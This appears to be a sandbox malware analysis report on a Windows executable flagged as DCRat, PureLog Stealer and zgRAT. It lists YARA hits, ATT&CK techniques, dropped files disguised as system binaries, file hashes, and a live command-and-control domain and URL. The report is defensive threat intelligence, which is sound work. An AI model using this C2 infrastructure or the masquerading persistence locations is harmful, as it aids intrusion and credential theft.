                              Source: Yara matchFile source: 00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 150bIjWiGH.exe PID: 7648, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 150bIjWiGH.exe PID: 7956, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 150bIjWiGH.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.150bIjWiGH.exe.fc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1674964023.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Google\Chrome\Application\Idle.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 150bIjWiGH.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.150bIjWiGH.exe.fc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Google\Chrome\Application\Idle.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 150bIjWiGH.exe PID: 7648, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 150bIjWiGH.exe PID: 7956, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 150bIjWiGH.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.150bIjWiGH.exe.fc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1674964023.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Google\Chrome\Application\Idle.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 150bIjWiGH.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.150bIjWiGH.exe.fc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\winlogon.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Google\Chrome\Application\Idle.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\conhost.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts141
                              Windows Management Instrumentation                              		1
                              Scripting                              		12
                              Process Injection                              		13
                              Masquerading                              		OS Credential Dumping331
                              Security Software Discovery                              		Remote Services11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		LSASS Memory2
                              Process Discovery                              		Remote Desktop ProtocolData from Removable Media2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                              Virtualization/Sandbox Evasion                              		Security Account Manager251
                              Virtualization/Sandbox Evasion                              		SMB/Windows Admin SharesData from Network Shared Drive12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Process Injection                              		NTDS1
                              Application Window Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Deobfuscate/Decode Files or Information                              		LSA Secrets2
                              File and Directory Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              Obfuscated Files or Information                              		Cached Domain Credentials134
                              System Information Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Software Packing                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              DLL Side-Loading                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575493 Sample: 150bIjWiGH.exe Startdate: 15/12/2024 Architecture: WINDOWS Score: 100 40 nutipa.ru 2->40 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Antivirus detection for URL or domain 2->48 50 13 other signatures 2->50 8 150bIjWiGH.exe 4 44 2->8         started        signatures3 process4 file5 24 C:\Users\user\Desktop\zTDGhHfd.log, PE32 8->24 dropped 26 C:\Users\user\Desktop\yVbyLHQi.log, PE32 8->26 dropped 28 C:\Users\user\Desktop\xiXqauUk.log, PE32 8->28 dropped 30 30 other malicious files 8->30 dropped 52 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->52 54 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 8->54 12 cmd.exe 1 8->12         started        signatures6 process7 process8 14 150bIjWiGH.exe 14 24 12->14         started        18 w32tm.exe 1 12->18         started        20 conhost.exe 12->20         started        22 chcp.com 1 12->22         started        dnsIp9 42 nutipa.ru 104.21.64.130, 49738, 49740, 49742 CLOUDFLARENETUS United States 14->42 32 C:\Users\user\Desktop\wINPCZGL.log, PE32 14->32 dropped 34 C:\Users\user\Desktop\vUJHQLLN.log, PE32 14->34 dropped 36 C:\Users\user\Desktop\saGrZLhX.log, PE32 14->36 dropped 38 19 other malicious files 14->38 dropped file10

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              150bIjWiGH.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              150bIjWiGH.exe100%AviraHEUR/AGEN.1323342
                              150bIjWiGH.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat100%AviraBAT/Delbat.C
                              C:\Program Files\Google\Chrome\Application\Idle.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\HwrGmkBt.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\Desktop\BDOgJEwE.log100%AviraTR/AVI.Agent.updqb
                              C:\Users\user\Desktop\ItSOHkQo.log100%AviraTR/Agent.jbwuj
                              C:\Users\user\Desktop\NjdutxKy.log100%AviraHEUR/AGEN.1362695
                              C:\Recovery\winlogon.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\JtmEmBJF.log100%AviraHEUR/AGEN.1300079
                              C:\Users\user\Desktop\NsNNYhlE.log100%AviraTR/AVI.Agent.updqb
                              C:\Recovery\conhost.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\Desktop\CBqofELz.log100%Joe Sandbox ML
                              C:\Program Files\Google\Chrome\Application\Idle.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\JBWWRkkK.log100%Joe Sandbox ML
                              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\HwrGmkBt.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\XXHldJFg.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\NjdutxKy.log100%Joe Sandbox ML
                              C:\Recovery\winlogon.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\EOEXonVW.log100%Joe Sandbox ML
                              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe100%Joe Sandbox ML
                              C:\Users\user\Desktop\NpUfPQGh.log100%Joe Sandbox ML
                              C:\Users\user\Desktop\JtmEmBJF.log100%Joe Sandbox ML
                              C:\Recovery\conhost.exe100%Joe Sandbox ML
                              C:\Program Files\Google\Chrome\Application\Idle.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\KcduafKotlNaKVM.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\conhost.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\winlogon.exe71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\BDOgJEwE.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\CBqofELz.log21%ReversingLabs
                              C:\Users\user\Desktop\EOEXonVW.log8%ReversingLabs
                              C:\Users\user\Desktop\FInxAXGv.log29%ReversingLabs
                              C:\Users\user\Desktop\HwrGmkBt.log17%ReversingLabs
                              C:\Users\user\Desktop\INSOfWoM.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\ItSOHkQo.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\JBWWRkkK.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\JtmEmBJF.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\NjdutxKy.log17%ReversingLabs
                              C:\Users\user\Desktop\NpUfPQGh.log5%ReversingLabs
                              C:\Users\user\Desktop\NsNNYhlE.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\OmvnkQVc.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\SLfLdrcT.log12%ReversingLabs
                              C:\Users\user\Desktop\UhRuWMEn.log8%ReversingLabs
                              C:\Users\user\Desktop\WagdIJql.log12%ReversingLabs
                              C:\Users\user\Desktop\XXHldJFg.log21%ReversingLabs
                              C:\Users\user\Desktop\YDIlGXhH.log4%ReversingLabs
                              C:\Users\user\Desktop\ZAjtbXwC.log8%ReversingLabs
                              C:\Users\user\Desktop\aInBkXPZ.log17%ReversingLabs
                              C:\Users\user\Desktop\aauTzsJb.log8%ReversingLabs
                              C:\Users\user\Desktop\ctybNUhB.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\fBwkimbw.log25%ReversingLabs
                              C:\Users\user\Desktop\ftMSEDAr.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\gJztsmvT.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\imbBpzmp.log25%ReversingLabs
                              C:\Users\user\Desktop\jafJbNin.log21%ReversingLabs
                              C:\Users\user\Desktop\krGRUzVH.log4%ReversingLabs
                              C:\Users\user\Desktop\lcSrxwmi.log25%ReversingLabs
                              C:\Users\user\Desktop\mrAShSvf.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                              C:\Users\user\Desktop\mutAqiZC.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\pekirssD.log21%ReversingLabs
                              C:\Users\user\Desktop\pfYQxwkv.log5%ReversingLabs
                              C:\Users\user\Desktop\qhrIoOvZ.log8%ReversingLabs
                              C:\Users\user\Desktop\rhLyTfpq.log29%ReversingLabs
                              C:\Users\user\Desktop\sSWZvcGR.log17%ReversingLabs
                              C:\Users\user\Desktop\saGrZLhX.log8%ReversingLabs
                              C:\Users\user\Desktop\taahEcao.log25%ReversingLabs
                              C:\Users\user\Desktop\trhzTxUr.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\vUJHQLLN.log8%ReversingLabs
                              C:\Users\user\Desktop\wINPCZGL.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                              C:\Users\user\Desktop\xiXqauUk.log8%ReversingLabs
                              C:\Users\user\Desktop\yVbyLHQi.log25%ReversingLabs
                              C:\Users\user\Desktop\zTDGhHfd.log25%ReversingLabs

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              No Antivirus matches

                              URLs

                              SourceDetectionScannerLabelLink
                              http://nutipa.ru100%Avira URL Cloudmalware
                              http://nutipa.ru/100%Avira URL Cloudmalware
                              http://nutipa.ru/_authGamewordpress.php100%Avira URL Cloudmalware

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              nutipa.ru
                              		104.21.64.130
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://nutipa.ru/_authGamewordpress.phptrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nutipa.ru150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000003165000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name150bIjWiGH.exe, 00000000.00000002.1722563578.0000000003F80000.00000004.00000800.00020000.00000000.sdmp, 150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://nutipa.ru/150bIjWiGH.exe, 00000005.00000002.2924790458.0000000002FC8000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  104.21.64.130
                                  		nutipa.ruUnited States
                                  		13335CLOUDFLARENETUStrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1575493
                                  Start date and time:2024-12-15 19:35:16 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 52s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:11
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:150bIjWiGH.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:E7870CD0C30A52066C454C15A5A5A2F5.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@10/64@1/1
                                  EGA Information:Failed
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target 150bIjWiGH.exe, PID 7648 because it is empty
                                  • Execution Graph export aborted for target 150bIjWiGH.exe, PID 7956 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: 150bIjWiGH.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  13:36:24API Interceptor2297010x Sleep call for process: 150bIjWiGH.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  104.21.64.130wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    https://my.invoice-maker.app/share/invoice/73067339-8011-4BFE-BECF-AEC852361CE2Get hashmaliciousPayPal PhisherBrowse
                                      https://my.invoice-maker.app/share/invoice/73067339-8011-4BFE-BECF-AEC852361CE2Get hashmaliciousPayPal PhisherBrowse
                                        https://casa.tiscali.it/promo/?u=https://rajputnepal.org.np/images/wp/auth/sf_rand_string_lowercase/brogers@homeownersfg.comGet hashmaliciousUnknownBrowse
                                          http://vk.com/away.php?to=http://5pp.n0u.mindfly.sa.com./?YYY%3A%2F%2F%23.cGF0cmljaWEuZW5nZWxicmVjaHRAZXVyLm5sGet hashmaliciousHTMLPhisherBrowse
                                            https://staelensbe-my.sharepoint.com/:o:/g/personal/y_perat_staelens_be/Eh14BaQBnshOnnl-1qkV04QBK4iCBXufLQTxHyB9kk2q_A?e=5%3a4EIhFl&at=9Get hashmaliciousHTMLPhisher, SharepointPhisherBrowse
                                              Agreements Signature UYBWE6432324.htmlGet hashmaliciousUnknownBrowse
                                                https://imsciencesedupk-my.sharepoint.com/:o:/g/personal/asim_iqbal_imsciences_edu_pk/ElMAC5PDodtLven3cSAK7AsBoGl8vhEeoWFGC5-26FuhVA?e=5%3ap8MOBi&at=9Get hashmaliciousSharepointPhisherBrowse
                                                  https://skinlaundry-my.sharepoint.com/:o:/p/hayley/ErwFOgIpkFpEkqlJMxBaZKABrOVvhmW-2C7PFfCQdhhmhA?e=5%3atlRlQl&at=9Get hashmaliciousHTMLPhisher, SharepointPhisherBrowse
                                                    File Documents UYBER87H412_23_24.htmlGet hashmaliciousUnknownBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      nutipa.ruwmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      • 172.67.185.214

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSSWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                      • 104.21.67.152
                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                      • 104.21.51.88
                                                      zapret.exeGet hashmaliciousUnknownBrowse
                                                      • 162.159.136.232
                                                      https://fsharetv.ioGet hashmaliciousUnknownBrowse
                                                      • 104.17.167.186
                                                      https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                      • 104.21.79.7
                                                      Merge.exeGet hashmaliciousNetSupport RATBrowse
                                                      • 104.26.1.231
                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                      • 172.67.207.38
                                                      wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                      • 172.67.179.207
                                                      AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                      • 172.67.207.38

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exewmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                        C:\Program Files\Google\Chrome\Application\Idle.exewmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          C:\Recovery\KcduafKotlNaKVM.exewmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                            Created / dropped Files

                                                            C:\Program Files\Google\Chrome\Application\6ccacd8608530f

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with very long lines (833), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):833
                                                            Entropy (8bit):5.900479262830104
                                                            Encrypted:false
                                                            SSDEEP:24:S9uDtY3es57ez+jMTeYYax+I06loWEnPJ8LXUXn:S8Bs57WTeji+IDov8Kn
                                                            MD5:5B360F0F49A86D396C1CC3F2EC72B8B3
                                                            SHA1:5477992029418C43B4330982188F2E16512FE922
                                                            SHA-256:7CB88DDC82C2449DA4F93C21D736C98784CF44B2F97B99A683EED403CBC25B63
                                                            SHA-512:4F1E3A730A10538A79F769D52FD2DBF70978A6309208D17FE00E5BA5214E306DB29FF3C27C5C17F0CC456C185C3A6540D91DB24B650097C1A8C161949A676044
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:7gzSdgYnakJsEsM43FlWy9XtgYhWmTfxp7foxddtmgBt0UhUxJtEpvB8JGwF9BBHEVCHNhGal2tS7n2M1MidjbI35hfrqYtke4peRaHPCTcxCsAfNjNwdihnNILqCZtNIIxD8X4bFSaQ8U1Mg9dGK7H5WCRJOaNnjPo356hzpwqKIQo2Q8JC5mCLA1q5GuMpExqtq7RjcnbXQ7xGYZ2QRLr7Mc2DQlt4kBFUj4LTqjkRLp5DDkhq25X3FtgNEOT04gwO1cgdNjkrlZvhhz9pDCCooMPzY8ObQtXp2qLlDEdSVqRp88qPPnw1dHkpNqEPVIb1CGp0nYm8jtT74j1aS8Mm6fLuGgXWAO7NPan1Szm0ByStymvozo6X5z5h55tGAP8UwGse6AHcWVkINb5dvthWRkRaeG6WFfzw077r4QrygeAjOwTdAQVRrlDMzS90EuW0fySPdNjeBtzwjrLrwcWzKiEO4v2mR1uvIJDZeEAwr0P8vQmHGREmYgq7tDVsU6MK8EoZnvNrbkITSGcnIvfAwIXldGqbtRbunEArmNdUEWKxYXonkrkjbMXzqD6hFv8KIYpNGvB4RL6a8jNFbC0Br2SbrKAiQ6OSX9pAsbhzppRQQ71H00FD57dQFOg5ucnU6nC84MXAfAVBkCLtT3sZ0LWagY4e4lFNB7Tm42MndFi5lbpCDwm1uNdvQmcfS3F35IAntizaqF6vnbzEs2bI8OdxdiVSZqUkAo9dbCTe7MKoRsHzwYwab74rpMKKNgBAuVu9cWnqi6KwDyfubgfB44IDtSxO2JRbKK367IXavG1fwIn0rZtqAAFzMrPJi

                                                            C:\Program Files\Google\Chrome\Application\Idle.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Google\Chrome\Application\Idle.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Google\Chrome\Application\Idle.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                            Joe Sandbox View:
                                                            • Filename: wmdqEYgW2i.exe, Detection: malicious, Browse
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@...................................8.K.....8. .....................8...................................................... ............... ..H............text....o8.. ...p8................. ..`.rsrc... .....8......r8.............@....reloc........8......v8.............@..B..................8.....H..........................B.-.;.8......................................0..........(.... ........8........E....N...)...M.......8I...(.... ....~r...{....9....& ....8....(.... ....~r...{....:....& ....8....*(.... ....8........0.......... ........8........E....R.......................8M...r...ps....z*....~....(T...~....(X... ....?.... ....~r...{....9....& ....8....~....(L... .... .... ....s....~....(P....... ....8[...8.... ....~r...{....:B...& ....87...~....9.... ....8#........

                                                            C:\Program Files\Google\Chrome\Application\Idle.exe:Zone.Identifier

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                            C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\150bIjWiGH.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):3700736
                                                            Entropy (8bit):7.825669080809428
                                                            Encrypted:false
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            MD5:E7870CD0C30A52066C454C15A5A5A2F5
                                                            SHA1:FC64203E05C104A116E7E4C354C9EE77C99737D6
                                                            SHA-256:E4A958444E72EB1B3BE02F3A8BF29044A81F328405A4969A4F66515EF219774E
                                                            SHA-512:3E0A40959EABA1FBF3CB7A11707BC658421F3066E4E1BEEA56088AC213C10524127D4D9E2500E549A1EE608887C113973892D54FB91FAE6EA9DB4EB9E818BEBE
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
